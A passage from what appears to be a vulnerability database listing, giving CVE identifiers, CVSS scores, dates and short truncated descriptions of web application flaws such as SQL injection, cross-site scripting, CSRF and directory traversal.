html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input tha
22-09-2016 - 21:59 16-12-2008 - 21:30
CVE-2013-3961 6.5
SQL injection vulnerability in edit_event.php in Simple PHP Agenda before 2.2.9 allows remote authenticated users to execute arbitrary SQL commands via the eventid parameter.
21-09-2016 - 10:25 11-03-2014 - 15:37
CVE-2009-5089 4.3
Directory traversal vulnerability in index.php in IdeaCart 0.02 and 0.02a allows remote attackers to read arbitrary files via a .. (dot dot) in the page parameter.
20-09-2016 - 00:00 12-09-2011 - 08:40
CVE-2011-5197 6.8
Cross-site request forgery (CSRF) vulnerability in index/manager/fileUpload in Public Knowledge Project Open Harvester Systems 2.3.1 and earlier allows remote attackers to hijack the authentication of administrators for requests that upload PHP files
19-09-2016 - 23:56 23-09-2012 - 13:55
CVE-2011-5196 6.8
Cross-site request forgery (CSRF) vulnerability in index/manager/fileUpload in Public Knowledge Project Open Journal Systems 2.3.6 and earlier allows remote attackers to hijack the authentication of administrators for requests that upload PHP files.
19-09-2016 - 23:56 23-09-2012 - 13:55
CVE-2011-5195 6.8
Cross-site request forgery (CSRF) vulnerability in index/manager/fileUpload in Public Knowledge Project Open Conference Systems 2.3.4 and earlier allows remote attackers to hijack the authentication of administrators for requests that upload a PHP fi
19-09-2016 - 23:55 23-09-2012 - 13:55
CVE-2013-6976 6.8
Cross-site request forgery (CSRF) vulnerability in goform/Quick_setup on Cisco EPC3925 devices allows remote attackers to hijack the authentication of administrators for requests that change a password via the Password and PasswordReEnter parameters,
15-09-2016 - 15:23 19-12-2013 - 17:55
CVE-2013-7136 9.3
The UPC Ireland Cisco EPC 2425 router (aka Horizon Box) does not have a sufficiently large number of possible WPA-PSK passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
09-09-2016 - 10:35 19-12-2013 - 17:55
CVE-2014-4034 7.5
SQL injection vulnerability in zero_view_article.php in ZeroCMS 1.0 allows remote attackers to execute arbitrary SQL commands via the article_id parameter.
06-09-2016 - 10:18 11-06-2014 - 10:55
CVE-2014-10021 7.5
Unrestricted file upload vulnerability in UploadHandler.php in the WP Symposium plugin 14.11 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to t
06-09-2016 - 09:10 13-01-2015 - 06:59
CVE-2012-4891 4.3
Cross-site scripting (XSS) vulnerability in fw/index2.do in ManageEngine Firewall Analyzer 7.2 allows remote attackers to inject arbitrary web script or HTML via the url parameter, a different vector than CVE-2012-4889. NOTE: the provenance of this
06-09-2016 - 09:05 10-09-2012 - 18:55
CVE-2007-2430 7.8
shared/code/tce_tmx.php in TCExam 4.0.011 and earlier allows remote attackers to create arbitrary PHP files in cache/ by placing file contents and directory traversal manipulations into a SessionUserLang cookie to public/code/index.php.
26-08-2016 - 21:59 01-05-2007 - 20:19
CVE-2007-2304 7.5
Multiple directory traversal vulnerabilities in Quick and Dirty Blog (QDBlog) 0.4, and possibly earlier, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the theme parameter to categories.php and other unspeci
23-08-2016 - 21:59 26-04-2007 - 17:19
CVE-2009-1030 4.3
Cross-site scripting (XSS) vulnerability in the choose_primary_blog function in wp-includes/wpmu-functions.php in WordPress MU (WPMU) before 2.7 allows remote attackers to inject arbitrary web script or HTML via the HTTP Host header.
22-08-2016 - 21:59 19-03-2009 - 20:30
CVE-2014-5370 7.5
Directory traversal vulnerability in the CFChart servlet (com.naryx.tagfusion.cfm.cfchartServlet) in New Atlanta BlueDragon before 7.1.1.18527 allows remote attackers to read or possibly delete arbitrary files via a .. (dot dot) in the QUERY_STRING t
18-08-2016 - 10:59 21-04-2015 - 11:59
CVE-2015-1875 7.5
SQL injection vulnerability in a2billing/customer/iridium_threed.php in Elastix 2.5.0 and earlier allows remote attackers to execute arbitrary SQL commands via the transactionID parameter.
03-08-2016 - 23:17 11-03-2015 - 10:59
CVE-2016-5304 4.9
Open redirect vulnerability in a report-routing component in Symantec Endpoint Protection Manager (SEPM) 12.1 before RU6 MP5 allows remote authenticated users to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vecto
01-07-2016 - 19:13 30-06-2016 - 19:59
CVE-2016-3653 6.0
Multiple cross-site request forgery (CSRF) vulnerabilities in management scripts in Symantec Endpoint Protection Manager (SEPM) 12.1 before RU6 MP5 allow remote authenticated users to hijack the authentication of arbitrary users.
01-07-2016 - 19:11 30-06-2016 - 19:59
CVE-2016-3652 3.5
Multiple cross-site scripting (XSS) vulnerabilities in management scripts in Symantec Endpoint Protection Manager (SEPM) 12.1 before RU6 MP5 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
01-07-2016 - 19:11 30-06-2016 - 19:59
CVE-2016-3670 4.3
Cross-site scripting (XSS) vulnerability in users.jsp in the Profile Search functionality in Liferay before 7.0.0 CE RC1 allows remote attackers to inject arbitrary web script or HTML via the FirstName field.
20-06-2016 - 08:35 13-06-2016 - 10:59
CVE-2015-4420 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Opsview 4.6.2 and earlier allow remote attackers to inject arbitrary web script or HTML via a (1) crafted check plugin, the (2) description in a host profile, or the (3) plugin_args parameter to
15-06-2016 - 09:22 18-06-2015 - 14:59
CVE-2014-8391 4.0
The Web interface in Sendio before 7.2.4 does not properly handle sessions, which allows remote authenticated users to obtain sensitive information from other users' sessions via a large number of requests.
27-05-2016 - 11:48 02-06-2015 - 10:59
CVE-2012-4901 4.3
Cross-site scripting (XSS) vulnerability in Template CMS 2.1.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the themes_editor parameter in an add_template action to admin/index.php.
27-05-2016 - 11:30 20-05-2015 - 15:59
CVE-2016-2784 2.6
CMS Made Simple 2.x before 2.1.3 and 1.x before 1.12.2, when Smarty Cache is activated, allow remote attackers to conduct cache poisoning attacks, modify links, and conduct cross-site scripting (XSS) attacks via a crafted HTTP Host header in a reques
26-05-2016 - 18:12 26-05-2016 - 10:59
CVE-2014-1683 6.8
The bashMail function in cms/data/skins/techjunkie/fragments/contacts/functions.php in SkyBlueCanvas CMS before 1.1 r248-04, when the pid parameter is 4, allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) name,
25-05-2016 - 11:16 29-01-2014 - 13:55
CVE-2014-1610 6.0
MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the page parameter to includes/med
25-05-2016 - 11:01 30-01-2014 - 18:55
CVE-2007-5992 7.5
SQL injection vulnerability in index.php in datecomm Social Networking Script (aka Myspace Clone Script) allows remote attackers to execute arbitrary SQL commands via the seid parameter in a viewcat s action on the forums page.
11-05-2016 - 12:06 15-11-2007 - 17:46
CVE-2016-0784 4.0
Directory traversal vulnerability in the Import/Export System Backups functionality in Apache OpenMeetings before 3.1.1 allows remote authenticated administrators to write to arbitrary files via a .. (dot dot) in a ZIP archive entry.
14-04-2016 - 18:33 11-04-2016 - 10:59
CVE-2015-8399 4.0
Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
14-04-2016 - 13:33 11-04-2016 - 17:59
CVE-2015-8398 4.3
Cross-site scripting (XSS) vulnerability in Atlassian Confluence before 5.8.17 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to rest/prototype/1/session/check.
13-04-2016 - 19:29 11-04-2016 - 17:59
CVE-2015-6541 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the Mail interface in Zimbra Collaboration Server (ZCS) before 8.5 allow remote attackers to hijack the authentication of arbitrary users for requests that change account preferences via a
11-04-2016 - 13:44 08-04-2016 - 10:59
CVE-2014-9727 10.0
AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm.
06-04-2016 - 08:49 29-05-2015 - 11:59
CVE-2016-0793 5.0
Incomplete blacklist vulnerability in the servlet filter restriction mechanism in WildFly (formerly JBoss Application Server) before 10.0.0.Final on Windows allows remote attackers to read the sensitive files in the (1) WEB-INF or (2) META-INF direct
04-04-2016 - 13:48 01-04-2016 - 15:59
CVE-2014-3704 7.5
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
31-03-2016 - 13:36 15-10-2014 - 20:55
CVE-2013-6023 7.8
Directory traversal vulnerability in the TVT TD-2308SS-B DVR with firmware 3.2.0.P-3520A-00 and earlier allows remote attackers to read arbitrary files via .. (dot dot) in the URI.
31-03-2016 - 13:31 02-11-2013 - 17:55
CVE-2015-8279 5.0
Web Viewer 1.0.0.193 on Samsung SRN-1670D devices allows remote attackers to read arbitrary files via a request to an unspecified PHP script.
20-01-2016 - 14:53 14-01-2016 - 22:59
CVE-2015-8261 7.5
The DroneDeleteOldMeasurements implementation in Ipswitch WhatsUp Gold before 16.4 does not properly validate serialized XML objects, which allows remote attackers to conduct SQL injection attacks via a crafted SOAP request.
08-01-2016 - 14:06 07-01-2016 - 21:59
CVE-2015-5996 6.8
Cross-site request forgery (CSRF) vulnerability on Mediabridge Medialink MWN-WAPR300N devices with firmware 5.07.50 allows remote attackers to hijack the authentication of arbitrary users.
31-12-2015 - 16:12 31-12-2015 - 00:59
CVE-2015-8368 6.0
ntopng (aka ntop) before 2.2 allows remote authenticated users to change the login context and gain privileges via the user cookie and username parameter to admin/password_reset.lua.
18-12-2015 - 13:43 17-12-2015 - 14:59
CVE-2015-8566 7.5
The Session package 1.x before 1.3.1 for Joomla! Framework allows remote attackers to execute arbitrary code via unspecified session values.
17-12-2015 - 12:32 16-12-2015 - 16:59
CVE-2015-6402 4.3
Cross-site scripting (XSS) vulnerability in the management interface on Cisco EPC3928 devices with EDVA 5.5.10, 5.5.11, and 5.7.1 allows remote attackers to inject arbitrary web script or HTML via an unspecified value, aka Bug ID CSCux24935.
14-12-2015 - 22:40 13-12-2015 - 22:59
CVE-2015-6401 7.5
Cisco EPC3928 devices with EDVA 5.5.10, 5.5.11, and 5.7.1 allow remote attackers to bypass an intended authentication requirement and execute unspecified administrative functions via a crafted HTTP request, aka Bug ID CSCux24941.
14-12-2015 - 22:40 13-12-2015 - 22:59
CVE-2014-5193 4.3
Cross-site scripting (XSS) vulnerability in admin/admin.php in Sphider 1.3.6 allows remote attackers to inject arbitrary web script or HTML via the category parameter. NOTE: the url parameter vector is already covered by CVE-2014-5082.
04-12-2015 - 11:18 07-08-2014 - 07:13
CVE-2015-1494 4.3
The FancyBox for WordPress plugin before 3.0.3 for WordPress does not properly restrict access, which allows remote attackers to conduct cross-site scripting (XSS) attacks via an mfbfw[*] parameter in an update action to wp-admin/admin-post.php, as d
27-11-2015 - 14:20 17-02-2015 - 10:59
CVE-2008-2566 4.3
Multiple cross-site scripting (XSS) vulnerabilities in PHP Address Book 3.1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the group parameter to (1) index.php or (2) the default URI.
27-11-2015 - 12:16 06-06-2008 - 14:32
CVE-2008-2565 7.5
Multiple SQL injection vulnerabilities in PHP Address Book 3.1.5 and earlier allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) view.php and (2) edit.php. NOTE: it was later reported that 4.0.x is also affected.
27-11-2015 - 12:16 06-06-2008 - 14:32
CVE-2015-7808 7.5
The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/h
25-11-2015 - 15:23 24-11-2015 - 15:59
CVE-2008-4157 7.5
SQL injection vulnerability in groups.php in Vastal I-Tech phpVID 1.1 allows remote attackers to execute arbitrary SQL commands via the cat parameter, a different vector than CVE-2007-3610. NOTE: it was later reported that 1.2.3 is also affected.
24-11-2015 - 13:07 22-09-2008 - 14:34
CVE-2015-2049 9.0
Unrestricted file upload vulnerability in D-Link DCS-931L with firmware 1.04 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension.
24-11-2015 - 11:54 23-02-2015 - 12:59
CVE-2008-2335 4.3
Cross-site scripting (XSS) vulnerability in search_results.php in Vastal I-Tech phpVID 1.1 and 1.2 allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: some of these details are obtained from third party info
24-11-2015 - 11:45 19-05-2008 - 09:20
CVE-2015-1365 5.0
Directory traversal vulnerability in pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress allows remote attackers to write to arbitrary files via a .. (dot dot) in the q parameter.
23-11-2015 - 13:32 27-01-2015 - 15:04
CVE-2014-7176 6.5
SQL injection vulnerability in Enalean Tuleap before 7.5.99.4 allows remote authenticated users to execute arbitrary SQL commands via the lobal_txt parameter to plugins/docman.
20-11-2015 - 11:26 04-11-2014 - 10:55
CVE-2014-8690 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Exponent CMS before 2.1.4 patch 6, 2.2.x before 2.2.3 patch 9, and 2.3.x before 2.3.1 patch 4 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, the (2) src para
19-11-2015 - 12:24 19-02-2015 - 10:59
CVE-2015-1518 7.5
SQL injection vulnerability in the search_post function in includes/search.php in Redaxscript before 2.3.0 allows remote attackers to execute arbitrary SQL commands via the search_terms parameter.
19-11-2015 - 11:55 11-02-2015 - 14:59
CVE-2014-1222 4.0
Directory traversal vulnerability in kcfinder/browse.php in Vtiger CRM before 6.0.0 Security patch 1 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter in a download action. NOTE: it is likely that thi
19-11-2015 - 11:54 12-08-2014 - 19:55
CVE-2014-5460 6.5
Unrestricted file upload vulnerability in the Tribulant Slideshow Gallery plugin before 1.4.7 for WordPress allows remote authenticated users to execute arbitrary code by uploading a PHP file, then accessing it via a direct request to the file in wp-
16-11-2015 - 23:07 11-09-2014 - 11:55
CVE-2014-6037 7.5
Directory traversal vulnerability in the agentUpload servlet in ZOHO ManageEngine EventLog Analyzer 9.0 build 9002 and 8.2 build 8020 allows remote attackers to execute arbitrary code by uploading a ZIP file which contains an executable file with ..
13-11-2015 - 12:53 26-10-2014 - 15:55
CVE-2014-5082 7.5
Multiple SQL injection vulnerabilities in admin/admin.php in Sphider 1.3.6 and earlier, Sphider Pro, and Sphider-plus allow remote attackers to execute arbitrary SQL commands via the (1) site_id or (2) url parameter.
04-11-2015 - 11:32 06-08-2014 - 14:55
CVE-2015-5285 5.0
CRLF injection vulnerability in Kallithea before 0.3 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the came_from parameter to _admin/login.
30-10-2015 - 16:00 29-10-2015 - 16:59
CVE-2014-1695 4.3
Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML email.
13-10-2015 - 12:35 28-02-2014 - 19:01
CVE-2014-2647 4.3
Cross-site scripting (XSS) vulnerability in HP Operations Agent in HP Operations Manager (formerly OpenView Communications Broker) before 11.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
08-10-2015 - 11:01 18-10-2014 - 21:55
CVE-2014-2579 7.6
Multiple cross-site request forgery (CSRF) vulnerabilities in XCloner Standalone 3.5 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) change the administrator password via the config task to inde
08-10-2015 - 10:50 25-04-2014 - 16:55
CVE-2015-7707 6.5
Ignite Realtime Openfire 3.10.2 allows remote authenticated users to gain administrator access via the isadmin parameter to user-edit-form.jsp.
06-10-2015 - 14:13 05-10-2015 - 11:59
CVE-2014-4960 7.5
Multiple SQL injection vulnerabilities in models\gallery.php in Youtube Gallery (com_youtubegallery) component 4.x through 4.1.7, and possibly 3.x, for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) listid or (2) themeid
05-10-2015 - 22:37 21-07-2014 - 10:55
CVE-2014-8555 5.0
Directory traversal vulnerability in report/reportViewAction.jsp in Progress Software OpenEdge 11.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the selection parameter.
05-10-2015 - 17:45 12-11-2014 - 11:55
CVE-2015-3203 7.5
Unrestricted file upload vulnerability in h5ai before 0.25.0 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in the directory specified by the href
29-09-2015 - 15:25 28-09-2015 - 12:59
CVE-2014-3871 7.5
Multiple SQL injection vulnerabilities in register.php in Geodesic Solutions GeoCore MAX 7.3.3 (formerly GeoClassifieds and GeoAuctions) allow remote attackers to execute arbitrary SQL commands via the (1) c[password] or (2) c[username] parameter. N
29-09-2015 - 14:48 27-05-2014 - 09:55
CVE-2015-7382 7.5
SQL injection vulnerability in install.php in Web Reference Database (aka refbase) through 0.9.6 allows remote attackers to execute arbitrary SQL commands via the defaultCharacterSet parameter, a different issue than CVE-2015-6009.
28-09-2015 - 21:07 27-09-2015 - 22:59
CVE-2015-7381 7.5
Multiple PHP remote file inclusion vulnerabilities in install.php in Web Reference Database (aka refbase) through 0.9.6 allow remote attackers to execute arbitrary PHP code via the (1) pathToMYSQL or (2) databaseStructureFile parameter, a different i
28-09-2015 - 21:06 27-09-2015 - 22:59
CVE-2015-6009 7.5
Multiple SQL injection vulnerabilities in Web Reference Database (aka refbase) through 0.9.6 allow remote attackers to execute arbitrary SQL commands via (1) the where parameter to rss.php or (2) the sqlQuery parameter to search.php, a different issu
28-09-2015 - 20:52 27-09-2015 - 22:59
CVE-2015-6008 7.5
install.php in Web Reference Database (aka refbase) through 0.9.6 allows remote attackers to execute arbitrary commands via the adminPassword parameter, a different issue than CVE-2015-7381.
28-09-2015 - 20:51 27-09-2015 - 22:59
CVE-2015-6972 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Ignite Realtime Openfire 3.10.2 allow remote attackers to inject arbitrary web script or HTML via the (1) groupchatName parameter to plugins/clientcontrol/create-bookmark.jsp; the (2) urlName par
17-09-2015 - 21:54 16-09-2015 - 15:59
CVE-2015-3623 6.4
XML external entity (XXE) vulnerability in QlikTech Qlikview before 11.20 SR12 allows remote attackers to conduct server-side request forgery (SSRF) attacks and read arbitrary files via crafted XML data in a request to AccessPoint.aspx.
17-09-2015 - 14:43 16-09-2015 - 14:59
CVE-2015-6965 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the Contact Form Generator plugin 2.0.1 and earlier for WordPress allow remote attackers to hijack the authentication of administrators for requests that (1) create a field, (2) update a f
17-09-2015 - 14:21 16-09-2015 - 10:59
CVE-2014-7280 4.3
Cross-site scripting (XSS) vulnerability in the Web UI before 2.3.4 Build #85 for Tenable Nessus 5.x allows remote web servers to inject arbitrary web script or HTML via the server header.
08-09-2015 - 14:20 21-10-2014 - 11:55
CVE-2014-5464 4.3
Cross-site scripting (XSS) vulnerability in the nDPI traffic classification library in ntopng (aka ntop) before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the HTTP Host header.
08-09-2015 - 14:20 08-09-2014 - 10:55
CVE-2015-6811 7.5
SQL injection vulnerability in the Sophos Cyberoam CR500iNG-XP firewall appliance with CyberoamOS 10.6.2 MR-1 and earlier allows remote attackers to execute arbitrary SQL commands via the username parameter to login.xml.
04-09-2015 - 14:59 04-09-2015 - 11:59
CVE-2015-6810 3.5
Cross-site scripting (XSS) vulnerability in Invision Power Services IPS Community Suite (aka Invision Power Board, IPB, or Power Board) 4.x before 4.0.12.1 allows remote authenticated users to inject arbitrary web script or HTML via the event_locatio
04-09-2015 - 14:59 04-09-2015 - 11:59
CVE-2014-9605 9.4
WebUpgrade in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and create a system backup tarball, restart the server, or stop the filters on the server via a ' (single quote) chara
04-09-2015 - 14:31 04-09-2015 - 11:59
CVE-2015-6809 4.3
Multiple cross-site scripting (XSS) vulnerabilities in BEdita before 3.6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cfg[projectName] parameter to index.php/admin/saveConfig, the (2) data[stats_provider_url] parameter
04-09-2015 - 14:26 04-09-2015 - 11:59
CVE-2014-4645 4.3
Cross-site scripting (XSS) vulnerability in dhcpinfo.html in D-link DSL-2760U-E1 allows remote attackers to inject arbitrary web script or HTML via a hostname.
02-09-2015 - 13:16 25-06-2014 - 16:55
CVE-2006-3823 5.1
SQL injection vulnerability in index.php in GeodesicSolutions (1) GeoAuctions Premier 2.0.3 and (2) GeoClassifieds Basic 2.0.3 allows remote attackers to execute arbitrary SQL commands via the b parameter.
01-09-2015 - 12:59 25-07-2006 - 09:22
CVE-2014-3878 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the web client interface in Ipswitch IMail Server 12.3 and 12.4, possibly before 12.4.1.15, allow remote attackers to inject arbitrary web script or HTML via (1) the Name field in an add new cont
31-08-2015 - 14:28 05-06-2014 - 13:55
CVE-2014-3544 3.5
Cross-site scripting (XSS) vulnerability in user/profile.php in Moodle through 2.3.11, 2.4.x before 2.4.11, 2.5.x before 2.5.7, 2.6.x before 2.6.4, and 2.7.x before 2.7.1 allows remote authenticated users to inject arbitrary web script or HTML via th
31-08-2015 - 14:09 29-07-2014 - 07:10
CVE-2014-4710 4.3
Cross-site scripting (XSS) vulnerability in zero_user_account.php in ZeroCMS 1.0 allows remote attackers to inject arbitrary web script or HTML via the Full Name field.
28-08-2015 - 12:35 29-07-2014 - 10:55
CVE-2015-6519 7.5
SQL injection vulnerability in Arab Portal 3 allows remote attackers to execute arbitrary SQL commands via the showemail parameter in a signup action to members.php.
20-08-2015 - 13:38 18-08-2015 - 14:00
CVE-2015-6512 5.0
SQL injection vulnerability in the get_messages function in server/plugins/chatroom/chatroom.php in FreiChat 9.6 allows remote attackers to execute arbitrary SQL commands via the time parameter to server/freichat.php.
19-08-2015 - 19:10 18-08-2015 - 11:59
CVE-2015-6516 6.5
SQL injection vulnerability in cygnux.org sysPass 1.0.9 and earlier allows remote authenticated users to execute arbitrary SQL commands via the search parameter to ajax/ajax_search.php.
19-08-2015 - 14:51 18-08-2015 - 11:59
CVE-2015-4666 5.0
Directory traversal vulnerability in opm/read_sessionlog.php in Xceedium Xsuite 2.4.4.5 and earlier allows remote attackers to read arbitrary files via a ....// (quadruple dot double slash) in the logFile parameter.
13-08-2015 - 14:29 13-08-2015 - 10:59
CVE-2015-4665 4.3
Cross-site scripting (XSS) vulnerability in ajax_cmd.php in Xceedium Xsuite 2.4.4.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the fileName parameter.
13-08-2015 - 14:25 13-08-2015 - 10:59
CVE-2014-2043 6.5
SQL injection vulnerability in Resources/System/Templates/Data.aspx in Procentia IntelliPen before 1.1.18.1658 allows remote authenticated users to execute arbitrary SQL commands via the value parameter.
13-08-2015 - 14:04 13-03-2014 - 10:55
CVE-2014-0793 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the StackIdeas Komento (com_komento) component before 1.7.3 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) website or (2) latitude parameter in a comment to
13-08-2015 - 13:49 30-01-2014 - 13:55
CVE-2015-4616 5.0
Directory traversal vulnerability in includes/MapPinImageSave.php in the Easy2Map plugin before 1.2.5 for WordPress allows remote attackers to create arbitrary files via a .. (dot dot) in the map_id parameter.
11-08-2015 - 10:46 08-07-2015 - 12:59
CVE-2015-4614 7.5
Multiple SQL injection vulnerabilities in includes/Function.php in the Easy2Map plugin before 1.2.5 for WordPress allow remote attackers to execute arbitrary SQL commands via the mapName parameter in an e2m_img_save_map_name action to wp-admin/admin-
11-08-2015 - 10:46 08-07-2015 - 12:59
CVE-2014-0372 5.5
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, and 12.2.2 allows remote authenticated users to affect confidentiality and integrity via unkn
07-08-2015 - 13:42 15-01-2014 - 11:08
CVE-2014-8954 4.3
Multiple cross-site scripting (XSS) vulnerabilities in phpSound 1.0.5 allow remote attackers to inject arbitrary web script or HTML via the (1) Title or (2) Description fields in a playlist or the (3) filter parameter in an explore action to index.ph
06-08-2015 - 12:45 17-11-2014 - 11:59
CVE-2014-2009 5.0
The mPAY24 payment module before 1.6 for PrestaShop allows remote attackers to obtain credentials, the installation path, and other sensitive information via a direct request to api/curllog.log.
05-08-2015 - 12:34 12-09-2014 - 10:55
CVE-2014-2008 7.5
SQL injection vulnerability in confirm.php in the mPAY24 payment module before 1.6 for PrestaShop allows remote attackers to execute arbitrary SQL commands via the TID parameter.
05-08-2015 - 12:34 12-09-2014 - 10:55
CVE-2014-3740 3.5
Cross-site scripting (XSS) vulnerability in SpiceWorks before 7.2.00195 allows remote authenticated users to inject arbitrary web script or HTML via the Summary field in a ticket request to the portal page.
31-07-2015 - 21:41 11-09-2014 - 14:55
CVE-2014-3738 4.3
Cross-site scripting (XSS) vulnerability in Zenoss 4.2.5 allows remote attackers to inject arbitrary web script or HTML via the title of a device.
31-07-2015 - 21:40 20-05-2014 - 10:55
CVE-2014-3247 4.3
Cross-site scripting (XSS) vulnerability in Collabtive 1.2 allows remote authenticated users to inject arbitrary web script or HTML via the desc parameter in an Add project (addpro) action to admin.php.
31-07-2015 - 21:38 15-05-2014 - 10:55
CVE-2014-3110 4.3
Multiple cross-site scripting (XSS) vulnerabilities on Honeywell FALCON XLWeb Linux controller devices 2.04.01 and earlier and FALCON XLWeb XLWebExe controller devices 2.02.11 and earlier allow remote attackers to inject arbitrary web script or HTML
31-07-2015 - 21:36 24-07-2014 - 10:55
CVE-2013-2639 4.3
Cross-site scripting (XSS) vulnerability in CTERA Cloud Storage OS before 3.2.29.0, 3.2.42.0, and earlier allows remote attackers to inject arbitrary web script or HTML via the description in a project folder.
30-07-2015 - 10:43 11-02-2014 - 12:55
CVE-2014-1843 5.0
Directory traversal vulnerability in the web interface in Titan FTP Server before 10.40 build 1829 allows remote attackers to obtain the property information of an arbitrary home folder via a Properties action with a .. (dot dot) in the src parameter
29-07-2015 - 12:19 29-04-2014 - 06:37
CVE-2014-1842 5.0
Directory traversal vulnerability in the web interface in Titan FTP Server before 10.40 build 1829 allows remote attackers to list all usernames via a Go action with a .. (dot dot) in the search-bar value.
29-07-2015 - 12:18 29-04-2014 - 06:37
CVE-2014-1841 5.0
Directory traversal vulnerability in the web interface in Titan FTP Server before 10.40 build 1829 allows remote attackers to copy an arbitrary user's home folder via a Move action with a .. (dot dot) in the src parameter.
29-07-2015 - 12:17 29-04-2014 - 06:37
CVE-2015-2183 7.5
Multiple SQL injection vulnerabilities in the administrative backend in ZeusCart 4 allow remote administrators to execute arbitrary SQL commands via the id parameter in a (1) disporders detail or (2) subadminmgt edit action or (3) cid parameter in an
28-07-2015 - 11:05 10-03-2015 - 10:59
CVE-2013-6872 6.5
SQL injection vulnerability in managetimetracker.php in Collabtive before 1.2 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in a projectpdf action.
28-07-2015 - 10:49 21-01-2014 - 10:17
CVE-2008-6844 7.5
The registration view (/user/register) in eZ Publish 3.5.6 and earlier, and possibly other versions before 3.9.5, 3.10.1, and 4.0.1, allows remote attackers to gain privileges as other users via modified ContentObjectAttribute_data_user_login_30, Con
27-07-2015 - 14:36 02-07-2009 - 06:30
CVE-2013-6058 7.5
SQL injection vulnerability in appRain CMF 3.0.2 and earlier allows remote attackers to execute arbitrary SQL commands via the PATH_INFO to blog-by-cat/.
27-07-2015 - 12:11 14-11-2013 - 15:55
CVE-2014-0620 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Technicolor (formerly Thomson) TC7200 STD6.01.12 allow remote attackers to inject arbitrary web script or HTML via the (1) ADDNewDomain parameter to parental/website-filters.asp or (2) VmTracerou
24-07-2015 - 14:38 08-01-2014 - 10:30
CVE-2014-0780 7.5
Directory traversal vulnerability in NTWebServer in InduSoft Web Studio 7.1 before SP2 Patch 4 allows remote attackers to read administrative passwords in APP files, and consequently execute arbitrary code, via unspecified web requests.
24-07-2015 - 14:35 25-04-2014 - 01:12
CVE-2015-5530 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Free Reprintables ArticleFR 3.0.6 allow remote attackers to hijack the authentication of administrators for requests that add an administrator account via a request to dashboard/users/crea
21-07-2015 - 07:26 16-07-2015 - 11:59
CVE-2015-5529 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Free Reprintables ArticleFR 3.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) name parameter to dashboard/settings/categories/, (2) title or (3) rel parameter to das
21-07-2015 - 07:25 16-07-2015 - 11:59
CVE-2015-5520 4.3
Cross-site scripting (XSS) vulnerability in the Users module in Orchard 1.7.3 through 1.8.2 and 1.9.x before 1.9.1 allows remote attackers to inject arbitrary web script or HTML via the username when creating a new user account, which is not properly
17-07-2015 - 18:32 14-07-2015 - 12:59
CVE-2015-1579 5.0
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerab
14-07-2015 - 14:22 11-02-2015 - 14:59
CVE-2015-5150 3.5
Multiple cross-site scripting (XSS) vulnerabilities in Zoho ManageEngine SupportCenter Plus 7.90 allow remote authenticated users to inject arbitrary web script or HTML via the (1) query parameter in the run_query_editor_query module to CustomReportH
01-07-2015 - 11:43 30-06-2015 - 10:59
CVE-2015-5148 7.5
